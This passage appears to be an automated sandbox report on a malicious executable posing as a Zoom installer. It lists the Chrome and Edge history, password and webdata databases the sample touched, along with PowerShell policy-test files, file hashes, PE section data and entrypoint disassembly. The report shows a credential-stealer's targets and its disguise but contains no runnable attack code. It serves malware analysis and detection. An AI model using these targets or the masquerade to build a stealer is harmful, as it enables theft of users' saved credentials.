                                                                                SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                Malicious:true
                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\history.db

                                                                                Download File
                                                                                Process:C:\Users\user\Desktop\ZoomInstaller.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                                                                Category:dropped
                                                                                Size (bytes):159744
                                                                                Entropy (8bit):0.5394293526345721
                                                                                Encrypted:false
                                                                                SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                                                                MD5:52701A76A821CDDBC23FB25C3FCA4968
                                                                                SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                                                                SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                                                                SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                                                                Malicious:true
                                                                                Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\passwords.db

                                                                                Download File
                                                                                Process:C:\Users\user\Desktop\ZoomInstaller.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                Category:dropped
                                                                                Size (bytes):40960
                                                                                Entropy (8bit):0.8553638852307782
                                                                                Encrypted:false
                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                Malicious:true
                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\webdata.db

                                                                                Download File
                                                                                Process:C:\Users\user\Desktop\ZoomInstaller.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):106496
                                                                                Entropy (8bit):1.136471148832945
                                                                                Encrypted:false
                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                Malicious:true
                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web.db

                                                                                Download File
                                                                                Process:C:\Users\user\Desktop\ZoomInstaller.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                Category:dropped
                                                                                Size (bytes):196608
                                                                                Entropy (8bit):1.1239949490932863
                                                                                Encrypted:false
                                                                                SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                MD5:271D5F995996735B01672CF227C81C17
                                                                                SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\history.db

                                                                                Download File
                                                                                Process:C:\Users\user\Desktop\ZoomInstaller.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                                                Category:dropped
                                                                                Size (bytes):155648
                                                                                Entropy (8bit):0.5407252242845243
                                                                                Encrypted:false
                                                                                SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                                                MD5:7B955D976803304F2C0505431A0CF1CF
                                                                                SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                                                SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                                                SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                                                Malicious:true
                                                                                Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\passwords.db

                                                                                Download File
                                                                                Process:C:\Users\user\Desktop\ZoomInstaller.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                                                Category:dropped
                                                                                Size (bytes):51200
                                                                                Entropy (8bit):0.8745947603342119
                                                                                Encrypted:false
                                                                                SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                                                MD5:378391FDB591852E472D99DC4BF837DA
                                                                                SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                                                SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                                                SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\webdata.db

                                                                                Download File
                                                                                Process:C:\Users\user\Desktop\ZoomInstaller.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                Category:dropped
                                                                                Size (bytes):196608
                                                                                Entropy (8bit):1.1239949490932863
                                                                                Encrypted:false
                                                                                SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                MD5:271D5F995996735B01672CF227C81C17
                                                                                SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):1148
                                                                                Entropy (8bit):5.307749663821274
                                                                                Encrypted:false
                                                                                SSDEEP:24:3wzyl1SKco4KmZjKbmuu1od6em9qr9tYs4RPQoUEJ0gt/NKIl9rgaP:syl1SU4xymdajm9qr9tz4RIoUl8NDx
                                                                                MD5:8096F89594D46C75146A535C509A7C1C
                                                                                SHA1:6D185E00887CD308A204497F906B81B513727218
                                                                                SHA-256:F37C512E1653E192BB6581DF6E3AAEAB6C3F3C01C4302163C964EE2165CCFEED
                                                                                SHA-512:480DF21D3DCABA48484CBA3D01AC0D25C0E43907C16FD9BD2B7306F77483111A9B633856B2625CFC7C6220F8FDC3224D1B5370984121370BD4A0297BFE772578
                                                                                Malicious:false
                                                                                Preview:@...e.................................O.........................8...................=.@G..?...o.........System.Security.H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.................0..~.J.R...L........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Commands.Utility...D.......

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1lhv5iyp.2xa.psm1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_izlcbsf2.mzk.psm1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j5unehlc.psu.ps1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ly4ggyxz.xgr.psm1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_thjh42br.blg.ps1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u3qw2krb.bq4.psm1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_upcrjvg1.r0x.ps1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xizdcepk.vt1.ps1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                Static File Info

                                                                                General

                                                                                File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                Entropy (8bit):5.871451489415792
                                                                                TrID:
                                                                                • Win64 Executable GUI (202006/5) 92.65%
                                                                                • Win64 Executable (generic) (12005/4) 5.51%
                                                                                • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                • DOS Executable Generic (2002/1) 0.92%
                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                File name:ZoomInstaller.exe
                                                                                File size:22'207'488 bytes
                                                                                MD5:806a6ccce380785faa45512ce603c580
                                                                                SHA1:78a2936e19f0474f80f73144564e9f24c4559859
                                                                                SHA256:c831aebefaf218907d8164288a8249755c47f68b5a6dd223dcef2d150d8df396
                                                                                SHA512:f228fceffc0af944cff9d06058aa690b1f6bcaea252971ac6b33c58e88429b108c2c4189e807c2659f40035160a4fdeacae961704c81a3e1ba8f1739df2d8e9e
                                                                                SSDEEP:196608:KKopoPyXk3nLRT155J/YJMIYhOFWBe1ZiieX:zoP+dT155lD/ALiie
                                                                                TLSH:4A275B46FA9449DACA959435C9AB42C53730FC041F2AABD75A08F33C7DB27D9AE78340
                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.........R..@....&....+.`>...R................@..............................X.......^...`... ............................

                                                                                File Icon

                                                                                Icon Hash:0301c4e4ae4c2117

                                                                                Static PE Info

                                                                                General

                                                                                Entrypoint:0x1400013c0
                                                                                Entrypoint Section:.text
                                                                                Digitally signed:false
                                                                                Imagebase:0x140000000
                                                                                Subsystem:windows gui
                                                                                Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LARGE_ADDRESS_AWARE
                                                                                DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                                                                                TLS Callbacks:0x403e5220, 0x1, 0x403e5200, 0x1
                                                                                CLR (.Net) Version:
                                                                                OS Version Major:6
                                                                                OS Version Minor:1
                                                                                File Version Major:6
                                                                                File Version Minor:1
                                                                                Subsystem Version Major:6
                                                                                Subsystem Version Minor:1
                                                                                Import Hash:a7c025ffa07099999f6fbb8a47ebc600

                                                                                Entrypoint Preview

                                                                                Instruction
                                                                                dec eax
                                                                                sub esp, 28h
                                                                                dec eax
                                                                                mov eax, dword ptr [00738EA5h]
                                                                                mov dword ptr [eax], 00000001h
                                                                                call 00007F880CBB17AFh
                                                                                nop
                                                                                nop
                                                                                dec eax
                                                                                add esp, 28h
                                                                                ret
                                                                                nop dword ptr [eax]
                                                                                dec eax
                                                                                sub esp, 28h
                                                                                dec eax
                                                                                mov eax, dword ptr [00738E85h]
                                                                                mov dword ptr [eax], 00000000h
                                                                                call 00007F880CBB178Fh
                                                                                nop
                                                                                nop
                                                                                dec eax
                                                                                add esp, 28h
                                                                                ret
                                                                                nop dword ptr [eax]
                                                                                jmp 00007F880CF972F8h
                                                                                nop
                                                                                nop
                                                                                nop
                                                                                nop
                                                                                nop
                                                                                nop
                                                                                nop
                                                                                nop
                                                                                nop
                                                                                nop
                                                                                nop
                                                                                dec eax
                                                                                lea ecx, dword ptr [00000009h]
                                                                                jmp 00007F880CBB19E9h
                                                                                nop dword ptr [eax+00h]
                                                                                ret
                                                                                nop
                                                                                nop
                                                                                nop
                                                                                nop
                                                                                nop
                                                                                nop
                                                                                nop
                                                                                nop
                                                                                nop
                                                                                nop
                                                                                nop
                                                                                nop
                                                                                nop
                                                                                nop
                                                                                nop
                                                                                nop word ptr [eax+eax+00000000h]
                                                                                nop word ptr [eax+eax+00h]
                                                                                jmp dword ptr [eax]
                                                                                inc edi
                                                                                outsd
                                                                                and byte ptr [edx+75h], ah
                                                                                imul ebp, dword ptr [esp+20h], 203A4449h
                                                                                and bl, byte ptr [edi+46h]
                                                                                inc esi
                                                                                bound esi, dword ptr [edx]
                                                                                popad
                                                                                jnc 00007F880CBB1A6Dh
                                                                                aaa
                                                                                pop edi
                                                                                sub eax, 415F4D34h
                                                                                dec esi
                                                                                dec esp
                                                                                jnc 00007F880CBB1A67h
                                                                                pop eax
                                                                                das
                                                                                jns 00007F880CBB1A76h
                                                                                jns 00007F880CBB1A68h
                                                                                jnbe 00007F880CBB1A50h
                                                                                pop eax
                                                                                arpl word ptr [ebx+31h], bp
                                                                                jc 00007F880CBB1A65h
                                                                                dec edi
                                                                                popad
                                                                                xor bl, byte ptr [eax+7Ah]
                                                                                jc 00007F880CBB1A6Dh
                                                                                das
                                                                                sub eax, 5F517145h
                                                                                imul ebp, dword ptr [ecx+2Dh], 37h
                                                                                push ebp
                                                                                dec ecx
                                                                                pop eax
                                                                                dec edx

                                                                                Data Directories

                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x7a90000x159.edata
                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x7aa0000x17cc.idata
                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x7ae0000x1958.rsrc
                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x73b0000x16848.pdata
                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x7b00000xe360.reloc
                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x739ec00x28.rdata
                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x7aa5600x520.idata
                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                Sections

                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                .text0x10000x3e5fd00x3e60007ea4c339201cfc0d017ff0b87a4b19e3unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                .data0x3e70000x44b600x44c007f3a4311981f005dbdcd4a469317bf79False0.35641690340909093data4.7016112525326035IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                .rdata0x42c0000x30efa00x30f000980004199c90a11f5822ac71af072469unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                .pdata0x73b0000x168480x16a00f43182d3de97642869b35118a096df21False0.4437478418508287data5.7958538093412795IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                .xdata0x7520000x6e380x7000b67dc254f2818584b007d9f5e7f6c7d0False0.15841238839285715data4.555509799133882IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                .bss0x7590000x4fb900x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                .edata0x7a90000x1590x20030fe0610bc0a77d191a7ad97749dc072False0.41796875data3.6898871269927276IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                .idata0x7aa0000x17cc0x180080786bfdb64d5983762cc60cec534c6dFalse0.31103515625data4.581143990765701IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                .CRT0x7ac0000x600x200c169c31a7238605c1737945e51f7b6a8False0.064453125data0.3029571603346658IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                .tls0x7ad0000x100x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                .rsrc0x7ae0000x19580x1a00620ce9f25f196dce93d103918034bcf6False0.42232572115384615data5.972815278958329IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                .reloc0x7b00000xe3600xe40030c8e1f349b7c140a991746bf7696280False0.2539405153508772data5.433384464940853IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                /40x7bf0000xa000xa00f572ff26ebb6d763b114fcdf85f1b0b7False0.23125data2.172227556052624IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                /190x7c00000x4e8a6c0x4e8c0018482ad49d6930aadea4051e7032cd1aunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                /310xca90000x5bb30x5c0099cb2691f7a424dcc90dd9f3c5e9a3b4False0.25747282608695654data4.951740082737746IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                /450xcaf0000x2031340x203200d210e398493c72b90f26bbad6d9b7cf9unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                /570xeb30000x789080x78a0066ed03329fa137a3544f15b3ac177939False0.24312459520725388data4.819335116736298IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                /700xf2c0000x2d6e0x2e0002ddab6e6787fb523255ef99c09c7514False0.467476222826087data4.902638410052134IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                /810xf2f0000x38fcdf0x38fe00ebc4ad0edd74625957cdfbc2787f88b4unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                /920x12bf0000x1120600x112200991c4336c4aaf2c5a9b2538f095ccebbFalse0.1585593721500228data2.3723520688244295IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
